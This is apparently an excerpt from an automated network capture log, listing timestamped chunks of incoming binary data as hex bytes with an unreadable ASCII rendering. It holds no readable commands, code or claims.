                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1659INData Raw: db ab 43 24 26 b5 02 8e 97 80 d7 d5 21 dc 6c d6 52 07 08 e0 05 fc f8 14 e7 52 37 08 db 31 b3 99 3a 88 8b 5e 17 d6 fd f0 d3 ea 20 ce 65 ec 0e e0 45 75 88 40 62 ba 76 b7 36 70 16 d0 57 1d c4 b9 44 6c 06 fc 1a 3f 6a c8 b9 56 0d c6 36 bf 2c ad 0e e2 5c 43 4a 39 46 a5 c4 02 8e f5 b1 ee 23 b9 b9 1a 98 a8 0e 51 c5 ac 05 1c 0f cb 52 54 17 d3 8f c0 d8 cd 47 ba ed 6f 26 03 7f 56 87 28 c4 4e c0 03 c0 31 f8 05 8d 94 ed a2 0e 90 90 fe c0 72 ea 10 6d 4a b1 e0 32 67 dd a4 57 04 54 c5 25 c0 54 75 08 e7 5c 65 fd 80 f3 80 2d d5 41 5c 32 ba b0 e3 54 fc 78 3e e7 9a 31 95 44 5b f9 56 10 cb 77 e5 25 b1 2e 54 39 5e 98 76 ae 09 2b 62 df 1f 07 a8 83 38 97 88 6e e0 4f c0 7a ea 20 ce 35 e8 7c 75 80 40 56 06 96 52 87 08 6c 1b 75 80 86 24 fb 9b 6b ce 02 8e d4 2e cc 7b 01 47 eb 76 c1
                                                                                                                                                                                                                                                                                                              Data Ascii: C$&!lRR71:^ eEu@bv6pWDl?jV6,\CJ9F#QRTGo&V(N1rmJ2gWT%Tu\e-A\2Tx>1D[Vw%.T9^v+b8nOz 5|u@VRlu$k.{Gv
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1660INData Raw: ee 9d 25 9d ab d3 be e4 bf a0 eb 5c 2b 2e 50 07 08 24 e7 63 54 ba b0 b5 af dc dc 4a 06 1d 62 e6 56 c0 71 47 f0 14 9d 4b 71 11 2e 84 d1 c0 ea ea 10 15 9d a3 0e 90 a8 8f 61 3b f4 ff 07 e8 27 ce 92 ba f1 c0 51 58 81 d8 b5 c0 95 da 38 95 f9 31 2a 73 37 80 34 df 1f ef 52 07 70 b3 29 a1 80 a3 84 1d a1 ce e5 a0 1f 70 06 de 75 cd 85 b5 3d 70 a4 3a 84 73 19 28 a1 80 63 b1 40 f7 73 38 b0 71 a0 fb 72 2e 07 fb 93 e7 ce 5b e7 9a 32 0a 38 45 1d c2 b9 48 5c 41 9a 9b 5e db b5 15 f9 16 07 af 41 9e 1d dc 93 3f 3e 05 e6 5e c0 71 67 f0 14 9d db 4c 1d 20 52 db 93 e6 8e a8 a9 c0 b9 ea 10 89 99 b1 03 ee 42 ca 68 e9 df b4 8b 81 d5 80 1f 62 ed 96 20 dd a2 a2 ad b1 62 05 37 bb f5 48 6f 5e 9e 02 5e 51 87 70 b3 29 a1 80 c3 8f ed 71 2e 0d c7 01 eb ab 43 b8 22 7d 17 3f d2 d4 b9 4e 95
                                                                                                                                                                                                                                                                                                              Data Ascii: %\+.P$cTJbVqGKq.a;'QX81*s74Rp)pu=p:s(c@s8qr.[28EH\A^A?>^qgL RBhb b7Ho^^Qp)q.C"}?N
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1662INData Raw: 80 43 80 bb 6a ba bd 97 81 db 48 af 08 60 75 60 01 7c 47 fd 86 a4 d9 6e de 0b 38 e2 e3 05 1c ce 39 95 4f 02 6b aa 43 24 e4 35 e0 21 e0 61 e0 df d3 c7 38 ec 22 fb 5b c0 9b d8 05 c5 e1 d8 77 84 a1 58 9b ff 25 81 15 81 95 a6 ff e7 52 f8 77 f0 56 7d 15 38 9d 32 16 a4 9d ab 4b 09 df bb ea ee ce 73 38 b0 50 cd b7 59 8a 69 c0 63 d8 02 f4 bf 81 47 99 79 6c e7 84 e9 e3 cd e9 ff dd 11 d8 82 c5 60 ec 9a c2 52 c0 f2 d8 e2 da 0a d8 06 a3 1c 17 00 72 b4 3b b0 aa 3a 44 82 de c0 5a b2 5f 07 dc 8f bd 6e 9e c6 5e 47 ad ea 87 15 71 ac 08 ac 85 6d 42 dd 10 18 58 63 4e 57 3f ef be 51 cd 64 ec 3a e6 b5 58 47 e1 47 a6 8f 89 6d de ce a2 d8 e7 cc 2a d8 71 f2 5b e0 c5 34 31 bb 00 f8 1f 75 88 00 76 20 8f 02 8e 1c d7 d2 1f 9d 3e b2 d1 53 01 c7 8d a4 57 c0 b1 34 76 81 ed 61 75 10 31
                                                                                                                                                                                                                                                                                                              Data Ascii: CjH`u`|Gn89OkC$5!a8"[wX%RwV}82Ks8PYicGyl`Rr;:DZ_n^GqmBXcNW?Qd:XGGm*q[41uv >SW4vau1
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1663INData Raw: 1d ad 52 42 71 6c 6c 26 63 df 49 72 b7 05 30 48 1d a2 a2 6e ac 53 4a 6e 52 dc 6c dd ab 1c 0b 38 20 fd 0a a8 aa ba 49 73 71 f6 26 e0 4d 75 88 04 bd cf cc 73 d0 4b 34 1e ab 86 de 00 b8 4b 70 ff d7 12 df a2 41 2b 36 50 07 10 e9 0f 8c 51 87 a8 e0 01 60 9c 3a 84 9b ab 12 0a 38 4a fd 7c 71 2e 46 bb 60 3b 9d 4a 35 0d 6b d3 3b a3 70 23 f6 85 ce c7 80 3d 81 9d 88 f7 02 67 28 87 13 4f 4b 72 e7 62 d6 4f 1d 20 80 3a 8a 83 3f 04 6c 5f c3 ed e4 e2 59 60 77 ec f3 e6 09 71 96 56 8c c5 3a 41 ec 86 1d 81 eb 9a d7 17 d8 4f 1d 22 22 f7 01 9b 60 45 2d 6f 88 b3 b4 ea 71 60 3b ac b3 c0 cb e2 2c a5 38 90 34 3b f8 36 e1 6d b4 d7 df ab 78 0f f8 06 b0 26 d6 11 c2 85 75 be 3a 40 00 83 b0 22 8e 14 ad 0d cc af 0e 51 b3 69 c0 65 ea 10 4d e8 ad 80 e3 16 d2 dc 7d 59 6a 01 c7 6a c0 08 75
                                                                                                                                                                                                                                                                                                              Data Ascii: RBqll&cIr0HnSJnRl8 Isq&MusK4KpA+6PQ`:8J|q.F`;J5k;p#=g(OKrbO :?l_Y`wqV:AO""`E-oq`;,84;6mx&u:@"QieM}Yjju
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1664INData Raw: a3 29 9a 93 ea a2 5d 15 eb a8 03 54 f0 1c 76 7e a7 ab cf c9 a4 fd e5 e3 69 60 67 ec 0b f3 73 e2 2c ad ba 4e 1d a0 82 55 80 61 ea 10 81 2c 0f ac a1 0e 51 c1 24 e0 6a 75 08 d7 a3 12 2e 8e 8c 50 07 70 ae 70 cb 92 e6 11 89 55 bc 8b ed 5e 49 71 e3 40 55 53 81 c3 c8 eb 4c f6 de 94 7e fc 81 73 3d 99 5f 1d 20 80 d7 3b f8 b7 a9 76 55 ec d4 03 58 e7 91 92 76 d7 4f c0 ae 09 fd 4b 1d 24 71 1f a3 cc e3 53 26 60 d7 15 9f 14 e7 08 ed 1a e0 73 ea 10 89 1b 48 b9 c7 a7 7c 0b f8 ad 3a 44 60 6f 00 3b 01 2f a9 83 64 ec 02 75 80 00 06 62 45 1c 29 58 88 34 d7 48 7a 32 85 74 6b 17 5a 92 7b 01 c7 26 c0 22 ea 10 81 a4 58 c0 51 c2 ee ba d0 de 07 0e c1 2e 08 a7 64 32 70 0a b0 2a 70 91 38 4b bb 6e 23 bd a3 6b fa 90 e6 7b 46 15 a9 5e e8 bb 05 db 7d e4 e2 55 42 07 8e 12 16 12 9c 8b d9
                                                                                                                                                                                                                                                                                                              Data Ascii: )]Tv~i`gs,NUa,Q$ju.PppU^Iq@USL~s=_ ;vUXvOK$qS&`sH|:D`o;/dubE)X4Hz2tkZ{&"XQ.d2p*p8Kn#k{F^}UB
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1666INData Raw: ee 4a ac 6b b8 ab d7 05 ea 00 01 6c 0e 0c 56 87 e8 41 8e 85 9d 97 aa 03 84 d0 4e 01 07 c4 b7 9b bf 55 5b 00 4b a8 43 34 68 0d 75 80 0a fc 82 6d 18 8f 03 27 88 33 dc 0d 6c 84 5d 88 78 47 9c a5 49 29 16 25 ad aa 0e d0 a0 4f 91 66 f5 fc 14 e0 1a 75 08 d7 b2 71 ea 00 01 78 01 87 d6 0a c0 57 d5 21 5c 4b fa 01 3f a1 fd df 57 73 b3 cd f4 db cb d5 e3 c0 89 ea 10 11 7b 07 2b c2 ce 59 ee cf 71 e7 da b5 92 3a 40 00 4f 57 fc 77 1b d6 9a 22 6e b7 01 7f 56 87 88 d8 59 c0 4d ea 10 09 58 03 18 a4 0e 11 d0 d1 f8 42 f4 bc bc 0a 7c 5b 1d 22 11 1b a8 03 04 74 3a f0 a0 3a 44 c4 be 0c 4c 54 87 c8 cc f5 d8 fb 51 ce 06 02 5b aa 43 cc 43 1f ac c0 24 27 ef 53 c8 fa 49 bb 17 18 53 dd 15 dc 0d ec a7 0e d1 90 2e 60 35 75 88 36 4d 03 ee 52 87 28 c8 49 c0 fd 82 fb 7d 0b f8 02 b0 2e 69
                                                                                                                                                                                                                                                                                                              Data Ascii: JklVANU[KC4hum'3l]xGI)%OfuqxW!\K?Ws{+Yq:@OWw"nVYMXB|["t::DLTQ[CC$'SIS.`5u6MR(I}.i
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1667INData Raw: 54 42 d1 d3 64 d2 5e 97 50 fa ab 3a 40 84 96 c2 8e 62 ce 9d ff ed ab b9 96 74 4f 22 88 d1 2b c0 cd ea 10 0d 1b 00 6c a5 0e 31 8b dc 0a 38 de c6 0a d2 8a 51 b5 80 e3 ef c0 eb 75 06 09 68 5b 60 b4 3a 44 4d 46 02 0b ab 43 b4 c9 17 28 f5 9e c0 8e 3b a9 e2 29 e0 63 c0 1e c0 f3 b5 25 ca 47 8a cf ef a5 d4 01 6a b4 1f e9 1e 39 e0 17 20 d2 f4 2c 76 f1 30 77 5e c0 e1 5c 18 a3 80 c5 d4 21 1a 30 11 ff 9c eb d4 5f d4 01 1a e2 05 1c ae 74 5b a8 03 04 f2 50 c5 7f 57 c2 ae e8 5c 8f c9 0a e1 6c 75 80 08 95 f0 9a b9 1e 78 55 1d 22 51 7f 07 c6 a9 43 44 a6 84 ae 35 53 80 f3 d4 21 12 35 99 74 4f 22 88 55 09 f3 19 cb 31 2a a3 c9 af b0 f3 6a ec fa 52 31 aa 2e 74 4d 02 2e ac 33 48 40 7d 81 4f ab 43 d4 64 39 75 80 0a 52 5c e0 ce d1 cf b1 ee 19 ad 9a 8c 9d 5b be 2a 70 71 23 89 f2
                                                                                                                                                                                                                                                                                                              Data Ascii: TBd^P:@btO"+l18Quh[`:DMFC(;)c%Gj9 ,v0w^\!0_t[PW\luxU"QCD5S!5tO"U1*jR1.tM.3H@}OCd9uR\[*pq#
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1668INData Raw: 3e f7 9d eb c9 12 c0 18 75 88 40 a6 51 fd 7b f2 fc 75 06 89 90 2f 04 d5 c7 7f 53 9b dc 5f 33 63 81 a9 ea 10 99 f0 d7 8c c9 fd 35 03 fe b7 ae 93 cf 65 bd 6e c0 ba 2a e4 ec a3 a2 fb dd 00 18 26 ba ef a6 5c a2 0e a0 52 47 01 c7 5d c0 fd 35 dc 8e 4a aa 8b 7f a3 d5 01 2a 48 6d 51 db b9 aa 9e 54 07 68 53 6a c7 31 cd b0 36 b0 be 3a 44 07 52 2e 80 74 b3 ab ba b3 30 45 7b a9 03 38 97 a9 1c 2f 20 fa e2 54 fd 1e 55 07 68 40 8e cf 7d e7 7a f2 19 a0 8f 3a 44 20 8f 52 fd e2 7c 8e 5d a9 66 e5 0b 41 f5 79 5c 1d 20 12 f3 a9 03 34 cc bb 3a d7 67 3c f0 aa 3a 44 04 72 ff 9c 01 7f dd d4 c9 3f b7 eb 35 19 b8 54 1d a2 61 8b 03 ab 08 ee 37 b7 e3 53 a6 60 1d 38 8a 54 47 01 07 c0 1f 6a ba 1d 85 b5 81 cd d4 21 2a 48 b1 d5 ac 17 70 b8 52 a4 f6 5c 4f ed 38 a6 19 be a8 0e d0 81 77 81
                                                                                                                                                                                                                                                                                                              Data Ascii: >u@Q{u/S_3c5en*&\RG]5J*HmQThSj16:DR.t0E{8/ TUh@}z:D R|]fAy\ 4:g<:Dr?5Ta7S`8TGj!*HpR\O8w
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1670INData Raw: aa b4 ca e0 35 81 9d d4 21 9c cb 44 8e 17 10 87 a8 03 64 6a 98 3a 40 03 7c 17 a8 cb 55 37 70 a2 3a 84 c0 39 1d fe fb 49 e4 7d de b5 17 1b d4 cf bf 73 e4 f9 5d 72 56 fe 37 ae 97 cf 67 7a 47 5f b7 cb ff c6 f5 f2 f9 6c ce e3 c0 7d ea 10 0d 6b ba 80 a3 0b d8 aa e1 fb 08 ad f8 e3 53 a0 99 02 8e bf 00 6f 34 70 bb a1 7c 08 d8 5f 1d a2 17 f3 93 de 8e d7 d4 ba 11 38 d7 a9 d4 9e f3 b1 17 70 74 01 5f 55 87 e8 d0 ef f0 96 7b b9 bb 16 98 ac 0e 11 d8 37 48 ef 3b 89 73 31 ca 71 01 7b a8 3a 40 a6 72 9c d7 dc 17 9d 5c b9 0e 04 d6 51 87 10 e8 74 27 e5 34 f2 5e 58 cb f1 7d 5c cd e7 34 ff cf 52 5f 3c ad 97 cf a7 bf 66 5c 7b 7c 3e 9b 75 81 3a 40 c3 36 a1 d9 8d 18 ab 93 f6 91 f3 73 e3 05 1c 34 53 c0 f1 0e f0 fb 06 6e 37 a4 e3 88 bb 0b c7 28 75 80 0a 52 5b cc 76 ae 53 a9 3d e7
                                                                                                                                                                                                                                                                                                              Data Ascii: 5!Ddj:@|U7p:9I}s]rV7gzG_l}kSo4p|_8pt_U{7H;s1q{:@r\Qt'4^X}\4R_<f\{|>u:@6s4Sn7(uR[vS=
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1671INData Raw: 80 42 b9 82 bc 3b e3 f4 03 c6 d4 78 7b 5b 91 d7 73 f3 5e f2 7f 5f 6e 4b d3 05 1c 00 27 93 fe 85 e7 af 62 67 bb c7 62 80 3a 40 9b 52 5c c8 76 ae 53 a9 75 e0 00 18 a2 0e 30 8b 7d 49 bf fb c6 8d c0 ad ea 10 4e e6 0f c0 54 75 08 91 03 80 5d d5 21 32 71 27 d6 d5 c4 95 e1 09 75 80 06 6c ae 0e 90 91 55 80 85 d4 21 1a 30 56 1d c0 b9 1a 9c 42 d9 ef 77 af 01 17 d7 7c 9b 4f d5 7c 7b b1 59 93 b8 7e 7f a7 6a 08 b0 86 3a 44 24 72 7f cd 80 2f 46 d7 c5 e7 71 a6 dc 5f 37 eb 62 0b c6 ae 33 fe 9a 09 e7 6d e0 6a 75 88 86 d5 79 8c 4a 6e c7 a7 78 f7 8d 39 84 28 e0 b8 17 b8 2a c0 fd 34 69 41 ec 28 95 58 a4 56 c0 91 e2 42 b6 73 9d 4a f1 79 1f cb 71 51 83 80 6f a9 43 d4 e0 24 75 00 27 f5 2c 70 8d 3a 84 d0 af 80 25 d4 21 32 f1 45 fc 28 95 52 e4 b8 90 bd 1a f6 5b ca 75 6e 4b 75 80
                                                                                                                                                                                                                                                                                                              Data Ascii: B;x{[s^_nK'bgb:@R\vSu0}INTu]!2q'ulU!0VBw|O|{Y~j:D$r/Fq_7b3mjuyJnx9(*4iA(XVBsJyqQoC$u',p:%!2E(R[unKu
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1672INData Raw: b1 9d ab 4b 6a cf fd a9 c2 fb de 1c d8 45 78 ff 75 f9 0d 30 4e 1d c2 45 e7 54 75 80 08 0c c7 aa a9 bd cd 71 da 16 c4 ce a5 cc e9 87 62 6c ee 55 07 68 c8 92 d8 31 20 ae 7d c7 aa 03 34 c8 0b 38 5c 4a 56 04 6e c2 0a 19 1d 3c 0a fc ad e1 fb 28 61 31 7a 29 60 57 75 88 04 ed 8c bf 16 e7 e6 61 b4 d7 75 42 39 1c 2f 26 6f d7 22 c0 1e ea 10 91 2a e1 b3 66 03 f2 2d 08 6f d2 e7 d5 01 0a e7 c7 a8 cc 9b 1f 9f 52 88 d0 5f 76 c6 03 bf 08 7c 9f 4d 58 19 38 58 1d 22 21 a9 2d 62 3b 57 97 d4 9e fb aa 0e 1c dd c0 49 a2 fb ae d3 64 e0 07 ea 10 2e 4a 17 03 63 d5 21 22 b0 08 70 0d 76 a1 da a5 67 30 70 11 5e 84 d3 b4 5b d5 01 1a 74 8c 3a 40 82 56 02 3e a6 0e d1 90 c9 c0 1d ea 10 ce b5 68 6d e0 06 60 09 75 90 88 9c 80 bd 8e 9b 74 5f c3 b7 1f 8b a3 d4 01 12 f4 25 75 80 48 4d c0 76
                                                                                                                                                                                                                                                                                                              Data Ascii: KjExu0NETuqblUh1 }48\JVn<(a1z)`WuauB9/&o"*f-oR_v|MX8X"!-b;WId.Jc!"pvg0p^[t:@V>hm`ut_%uHMv
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1673INData Raw: c0 39 81 14 7f 24 85 ea c0 b1 00 f0 ed 40 f7 d5 b4 3f 63 e7 40 3b d7 aa 57 b1 e3 d7 dc 07 1d 84 5d a0 5f 51 1d a4 50 03 b0 23 0e 7f 0f 0c 16 67 71 65 2c 70 ff 18 58 4e 1d 22 32 87 53 c6 45 c3 12 9e df 2e 0d 5d c0 7e c0 fd d8 45 7b 37 6f 67 01 37 8b ee bb a4 c5 e8 91 d8 77 31 f5 f5 da 98 74 03 7f c0 e6 c6 b5 a6 a4 d7 0c d8 c6 ca 0f ab 43 44 66 5f 60 4f 75 88 84 bc 04 fc 4b 1d 22 a0 f5 81 af a9 43 44 66 21 e0 97 ea 10 6e ae 2e 07 de 53 87 68 d0 f6 d8 6f 92 56 e4 74 7c 0a c0 25 ea 00 b1 53 ff 20 78 89 7c 16 31 f6 07 36 09 74 5f a9 1d a1 92 e2 42 b6 73 9d 4a b1 70 29 54 71 d8 77 81 51 81 ee ab 49 93 b1 0b 05 ce b5 eb 7b d8 71 2a ee 83 56 c7 5a 97 ff 97 3a 48 61 56 c5 8e 4c 09 7d 2c a0 9b b7 12 16 b8 87 61 ad f8 bd f3 8e 59 8b 32 76 17 bf 08 dc a5 0e e1 1c b6
                                                                                                                                                                                                                                                                                                              Data Ascii: 9$@?c@;W]_QP#gqe,pXN"2SE.]~E{7og7w1tCDf_`OuK"CDf!n.ShoVt|%S x|16t_BsJp)TqwQI{q*VZ:HaVL},aY2v
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1675INData Raw: 09 e7 e2 75 14 fa d7 5d 3b a3 c9 2e 00 9f 8f e0 f1 d5 35 5e c3 77 ef b9 fa fd 14 fd 73 3b c5 f1 2a d6 d9 27 a7 1f 31 75 ea 02 76 02 6e 46 ff b7 2a 69 d4 fd 43 74 69 60 4a 04 8f 2b f4 f8 25 f9 14 7e ce 69 19 e0 41 f4 73 1c 7a dc 54 c7 e4 cd 61 6c 04 8f ab 89 e1 47 a8 b4 a7 3f f0 31 e0 4f 58 3b 5e f5 df 2f 97 b1 57 3b 7f 84 40 f6 40 3f 2f ca f1 10 b0 78 c7 b3 18 af 25 b0 4e 71 ea 79 56 ff 8d eb 34 3f 65 1e a3 32 63 8c 03 d6 ef 78 16 e3 b6 1f d6 7a 5f 3d d7 ca 51 e7 11 2a 00 7f 89 e0 31 29 c7 d7 3b 9f c2 a8 2d 49 99 47 74 cd 3a 52 3d 42 05 ac 40 5b 3d 7f 4d 8d e7 99 f7 46 96 af 47 90 af ae 31 15 58 6c 1e 8f d3 45 ae 2f f6 65 55 fd 24 aa 6b 5c 58 ef f4 fc c7 aa 11 3c b6 76 c7 c6 8d cc 84 73 f1 3a 11 fd eb ae 9d 71 79 33 d3 c0 d2 e4 75 21 f5 4b f5 4e 8f 73 80
                                                                                                                                                                                                                                                                                                              Data Ascii: u];.5^ws;*'1uvnF*iCti`J+%~iAszTalG?1OX;^/W;@@?/x%NqyV4?e2cxz_=Q*1);-IGt:R=B@[=MFG1XlE/eU$k\X<vs:qy3u!KNs
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1676INData Raw: b8 6c 2c 43 5e 17 a8 df 9a fe 98 ea f2 8f 08 1e 53 3b e3 b2 1a 1f bb 73 b1 1b 88 fe 35 d7 ee d8 af c6 c7 7f 6c 04 8f a7 ce 91 da ce 0c 97 be 0b d0 3f ef 4b 19 cf 60 dd 39 8e 01 36 25 8e 96 ba a3 b0 ce 1a c7 01 e7 03 af a1 9f 27 1f ad 8f a6 0a 38 00 fe 37 82 c7 17 d3 b8 0e d8 aa 93 09 ad d9 20 6c 47 67 ce 2d 5d db 1d 53 b0 23 31 9a 32 36 82 c7 e8 c3 47 0e e3 39 d2 ea 20 39 00 78 11 fd bc c5 36 a6 60 47 92 c4 78 84 e0 47 80 f3 f0 23 ff 7a 1b 4d 15 70 80 75 30 53 3f be d8 c6 5b c0 ff 61 5d a0 62 b4 2c 56 08 eb 8b d0 3d 8f a6 0a 38 c6 44 f0 d8 62 1c e7 12 e7 e7 0c d8 f5 f8 cf 63 df 6b d4 f3 14 f3 48 bd 80 a3 1f 79 1f b1 f8 db 59 1e eb 68 f2 fa ee b4 2f 2e 2b a7 a0 7f 52 d5 39 fe 41 7d c7 d6 9c 17 c1 e3 69 67 dc 53 d3 e3 76 2e 05 cb a0 7f cd b5 3b b6 ac e9 b1
                                                                                                                                                                                                                                                                                                              Data Ascii: l,C^S;s5l?K`96%'87 lGg-]S#126G9 9x6`GxG#zMpu0S?[a]b,V=8DbckHyYh/.+R9A}igSv.;
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1677INData Raw: 21 c4 7b 4e 5d 6c 4e 1c 7f ab 36 8c ce 4e a0 05 03 c4 51 21 57 52 9f f6 61 eb 11 bb c1 3e d8 c5 df f1 48 41 b9 f4 d3 2b b1 80 43 cd f0 8a ec 04 da d4 ed eb c9 ea c4 4e 9e 3a 15 6f 5c 07 fc 22 3b 09 35 de 34 a2 2d e0 f5 d8 0e 52 d2 5c 3f 02 3e 0e bc 2c 3b 91 8a 19 01 ac 3d 14 ea ad 9f d0 fb e2 0d 49 9d fb 37 b0 3b d5 2e de 80 58 08 3a 09 8f bc ec d4 9a 43 b1 63 76 22 ea 9b 41 e2 38 3e 8f ea 6c cf 28 60 ab a1 98 d7 58 a2 53 c7 a4 a1 78 8e 18 e3 39 c7 68 2e 4f 2c 42 af 35 f4 6b 55 d3 49 c0 17 89 a2 41 b5 6e 6d a2 3b d3 81 f3 fc de 34 a2 b0 63 ce f5 32 79 e8 f7 46 f0 fc 62 fa 55 89 a2 27 69 61 ce a4 be 05 1c 5b 03 ef cf 4e a2 40 8f 02 37 65 27 51 45 55 28 e0 00 b8 86 58 1c fc 70 76 22 05 3a 80 38 9b f9 e4 0e ff ff 2a 16 70 54 6d 51 5b ea d4 2b b3 13 68 53 37
                                                                                                                                                                                                                                                                                                              Data Ascii: !{N]lN6NQ!WRa>HA+CN:o\";54-R\?>,;=I7;.X:Ccv"A8>l(`XSx9h.O,B5kUIAnm;4c2yFbU'ia[N@7e'QEU(Xpv":8*pTmQ[+hS7
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1679INData Raw: 18 8b c7 79 49 65 33 0e d8 09 f8 6b 76 22 c9 7e 07 9c 9e 9d 84 54 21 0f 02 9f ca 4e 42 aa 98 c3 80 27 b2 93 90 04 58 c0 51 46 93 89 e3 0d d5 85 2a 17 70 00 dc 47 3d 17 2d 46 01 7f 00 5e d1 c2 9f ad 62 ab e4 2d b3 13 90 7a 64 ab ec 04 3a d0 4a 07 8e 4f 11 2d 78 eb 66 02 b1 d3 44 aa ba af 01 df cb 4e 42 2a c0 df 80 4f 64 27 51 71 3f 03 4e cb 4e 42 b5 37 08 fc 3f e0 91 ec 44 24 fd c7 43 c0 f6 78 a4 d1 1c 87 e1 6b 94 d4 8e 93 b0 a3 80 d4 8e a7 81 0f e1 b1 b6 52 19 5c 02 3c 97 9d 84 9e e7 22 60 7a 76 12 55 57 f5 02 0e 88 1d 7a d7 65 27 d1 03 2b 02 67 03 cb 0e f3 e7 aa 58 c0 b1 43 76 02 52 8f 6c 9f 9d 40 07 86 2b e0 d8 19 f8 6e 3f 12 49 f0 45 e0 e1 ec 24 a4 82 7c 0e f8 41 76 12 52 17 6e 07 de 0f cc ca 4e a4 06 0e 02 c6 64 27 a1 5a 3b 9a e8 62 26 a9 1c 6e 04 b6
                                                                                                                                                                                                                                                                                                              Data Ascii: yIe3kv"~T!NB'XQF*pG=-F^b-zd:JO-xfDNB*Od'Qq?NNB7?D$CxkR\<"`zvUWze'+gXCvRl@+n?IE$|AvRnNd'Z;b&n
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1680INData Raw: 8a 89 b9 f4 da a7 f1 f8 08 09 60 32 f1 f9 e1 33 3c bf 03 8f d4 6b 67 01 3b 13 67 61 2a d7 74 e0 3d f8 a5 5a 0b 36 40 1c d3 f0 eb ec 44 a4 06 9b d3 75 e3 18 fc cc d6 0b 33 89 ae 54 17 66 27 22 55 c8 0f 81 2f 66 27 21 55 c8 bd c4 77 e0 a7 b3 13 91 1a e6 4e e0 df d9 49 34 d4 d5 44 01 9b 0a 52 e7 02 8e 01 a2 c5 5b 15 3b 53 b4 ea d3 c0 e1 43 3f ff 67 66 22 1d 5a 89 d8 4d 22 55 59 15 8f 4f 81 78 43 5d 9a 68 a5 be 4e 6e 2a 3d 75 16 d1 b1 48 d2 5c df 07 76 22 ce 86 94 7a 69 10 38 1a d8 03 98 92 9c 8b e6 9a d3 d6 d7 8e 3c 7a a1 e9 c0 de 78 bc 80 94 65 3a f0 25 e2 3e c9 ad c9 b9 d4 dd 74 e0 dd c0 e5 d9 89 48 15 72 2c f0 3f d9 49 48 15 f2 6f e0 2d c0 b3 d9 89 48 0d e3 31 2a 39 ec f6 5a b0 3a 17 70 40 54 3a 7e 32 3b 89 1e fb 26 f0 41 aa 59 c0 01 d5 5d fc 96 e6 a8 e2
                                                                                                                                                                                                                                                                                                              Data Ascii: `23<kg;ga*t=Z6@Du3Tf'"U/f'!UwNI4DR[;SC?gf"ZM"UYOxC]hNn*=uH\v"zi8<zxe:%>tHr,?IHo-H1*9Z:p@T:~2;&AY]
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1681INData Raw: a8 10 e7 e3 5c f6 c3 b9 d9 09 d4 55 13 0b 38 20 9e 50 c7 66 27 a1 e7 59 99 78 73 94 aa e0 c0 ec 04 f4 3c 93 88 22 30 77 09 4b bd 31 93 38 86 6e 7d e0 57 58 04 db 54 83 c0 c9 c0 ab 88 9b 80 ee 46 69 86 3b 80 ad 89 dd ae 9e 33 5f 4d f7 00 6f 04 be 40 bc 9e 4b ea 8d 29 c0 8f 88 cf 4b fb 00 37 e6 a6 a3 82 cc 59 90 fe 22 be 86 66 3b 95 e8 10 e8 67 d0 72 1b 04 be 01 bc 0d 78 22 39 97 a6 fb 2f e2 7d 49 e5 77 3d f0 3a e0 2f d9 89 34 dc 95 c0 3b f0 fe 72 9d 4c c0 62 ea 5e bb 07 8f 50 eb 99 a6 16 70 00 1c 89 17 6f d9 7c 34 3b 01 a9 05 ab 12 c5 02 2a 8f 43 88 0e 1c 92 7a eb 31 e0 43 c0 16 f8 19 aa 69 fe 09 6c 47 74 b1 7b 3a 39 17 f5 df 4c e2 bb d3 b6 d8 75 a5 4a 06 89 73 b5 5f 43 5c c3 92 7a e3 36 62 87 f3 9a c0 27 80 fb 73 d3 51 0f 0c 12 9b c0 b6 05 ee 4c ce a5 a9
                                                                                                                                                                                                                                                                                                              Data Ascii: \U8 Pf'Yxs<"0wK18n}WXTFi;3_Mo@K)K7Y"f;grx"9/}Iw=:/4;rLb^Ppo|4;*Cz1CilGt{:9LuJs_C\z6b'sQL
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1683INData Raw: e3 95 f8 ba 50 86 b8 19 58 7a 98 b9 92 54 5e 8b 00 ef 26 76 b8 ce 24 ff 35 a5 69 71 3b 71 83 bb 2a 05 06 23 88 36 d2 d9 e3 d6 4e 7c b1 27 23 51 5d 2b 00 5f c5 e2 ad 22 62 00 b8 10 d8 b9 ad 19 a8 bf d1 c0 3d e4 cf 8f 51 fe 98 4a dc 78 3f 86 38 c7 dc ef 14 ea b5 c5 80 8f 03 8f 90 ff fc 2f 73 3c 43 14 bc 74 b3 83 7e 19 ea f1 59 e3 31 60 c9 2e c6 a1 0e de 4a 14 d7 65 cf 45 99 e3 7a e2 38 87 6e 9d 55 82 c7 52 44 6c 57 c0 58 54 d9 5a c0 8f b0 90 63 61 31 11 f8 0c ed 77 77 7a a1 77 96 e0 b1 14 11 c7 75 39 0e 55 f7 53 f2 e7 a0 2e f1 8d 36 c7 5e 2a cc 67 c9 bf 00 0c d8 6d b8 89 92 fa e4 24 f2 af 87 a6 c7 58 60 dd e1 26 4a 52 65 ac 06 fc 37 70 2b f9 af 2f 75 8e 27 89 9d 39 db 52 cd c2 d8 f5 88 d7 ff ec 71 6c 25 2e a0 9c 47 d1 94 c1 62 c0 81 c0 0d e4 cf 53 d5 62 32
                                                                                                                                                                                                                                                                                                              Data Ascii: PXzT^&v$5iq;q*#6N|'#Q]+_"b=QJx?8/s<Ct~Y1`.JeEz8nURDlWXTZca1wwzwu9US.6^*gm$X`&JRe7p+/u'9Rql%.GbSb2
